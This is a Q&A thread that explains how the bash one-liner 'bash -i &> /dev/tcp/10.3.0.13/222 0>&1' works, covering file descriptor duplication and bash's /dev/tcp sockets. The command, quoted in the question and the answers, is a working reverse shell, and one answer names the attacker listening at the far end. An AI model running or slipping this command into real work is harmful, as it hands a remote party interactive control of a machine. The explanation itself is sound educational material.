# What does the 0>&1 shell redirection mean?

Tags: shell

trying to understand the command:

```
bash -i &> /dev/tcp/10.3.0.13/222 0>&1
```

it means that the STDIN of "bash -i" will get the STDOUT contents?

Answer (score 16):

`&> file` itself is the same as `> file 2>&1`, that is open `file` in write-only mode on file descriptor 1, and duplicate that file descriptor 1 to the file descriptor 2, so that both fd 1 and 2 (stdout and stderr) point to that *open file description*

`0>&1` (same as `0<&1` or `<&1`) adds 0 (stdin) to the list. It duplicates fd 1 to 0 as well (fd 0 is made to point to the same resource as pointed to by fd 1).

Now, when doing `> /dev/tcp/host/port` in `bash` (like in ksh where the feature comes from), instead of doing a `open(file, O_WRONLY)`, `bash` creates a TCP socket and connects it to `host:port`. That's not a *write-only* redirection, that's a read+write network socket.

So you end up with fds 0, 1 and 2 of `bash -i` being a TCP socket. When `bash -i` reads on its stdin, it reads from the socket so from whatever sits at the other end of `host:post` and when it (or any command run from there) writes to fd 1 or 2, it is sent over that socket.

Comment: So the 0>&1 only works because the socket is RW?

Comment: @GabrielOrtizLour, `0>&1` does a `dup2(1, 0)` regardless of the mode fd 1 was open as, but if it were open in write-only mode, that would mean fd 0 would end-up being write-only, reads on it would fail, and applications in general, and bash -i here specifically want to read from fd 0 (their stdin), not write to it.

Comment: Note that writing `0<&1` would also have worked and would have been less confusing to the reader. I'd argue that would have been semantically more correct in this situation.

Answer (score 3):

Lets go step by step.

1. `bash -i` : opens an interactive shell
2. `&>` : redirects the standard output and error to the socket opened to the IP 10.3.0.13 which would be listening on port 222
3. `0>&1` : I like to read it as 0<&1. This would literally mean '0' is attached to '1', which means stdin is attached to stdout and from bullet point 2 we know that the stdin for this bash process is available to the attacker listening on port 222.

Answer (score 0):

In a nutshell, the command opens an interactive bash shell which reads input from and delivers its output and errors to, through a tcp socket, a host specified by the ip.

Details: (!!!As I'm not an expert, some descriptions might not accurate or precise.)

`&> /dev/tcp/10.3.0.13/222` has two parts. First:

```
/dev/tcp/10.3.0.13/222
```

> Bash handles several filenames specially when they are used in
> redirections, like
> `/dev/tcp/host/port`
>
> If host is a valid hostname or Internet address, and port is an
> integer port number or service name, Bash attempts to open the
> corresponding TCP socket.

Second:

> the `&>` redirection operator, for directing standard output and
> standard error to the same file.

So, `&> /dev/tcp/10.3.0.13/222` means open the corresponding TCP socket and redirects the stand output and stand error to the socket.

Redirecttions actually allocates a new file descriptor that refers to the same open file description as the old descriptor.

> An open file description is an entry in
> the system-wide table of open files.  The open file description
> records the file offset and the file status flags.  A
> file descriptor is a reference to an open file description; this
> reference is unaffected if pathname is subsequently removed or
> modified to refer to a different file.

Thus, actually the **stand output** and **stand error** (they are actually file descriptors) and **the file descriptor of the socket** now refers to the same **open file description**. That means whenever there are output or errors from the bash, these data is written into the socket and sent to the destination host specified above.

```
0>&1
```

redirects the **stand input** to the **stand output**. Using the idea from the above, it literally means the **stand input** refers to the same **open file description** which is referred by the **stand output**; which is the same one which is also referred by the **stand error** and **the file descriptor of the socket**. That means whenever the host which executed this command receives any data through the **tcp socket**, the bash reads it as input.

If don't possess the knowledge of what redirections actually means, it's quite difficult do understand what means by redirecting the **stand input** to the **stand output**. It doesn't mean read the **stand output** as the **stand input**, as it doesn't make sense. It actually means the **stand input** and the **stand output** refers to the same **open file description**. So the command reads it input and delivers its output to the same file, like here, the socket.

References:

https://www.gnu.org/savannah-checkouts/gnu/bash/manual/bash.html#Redirections
https://man7.org/linux/man-pages/man2/dup.2.html

https://man7.org/linux/man-pages/man2/open.2.html

https://man7.org/linux/man-pages/man2/socket.2.html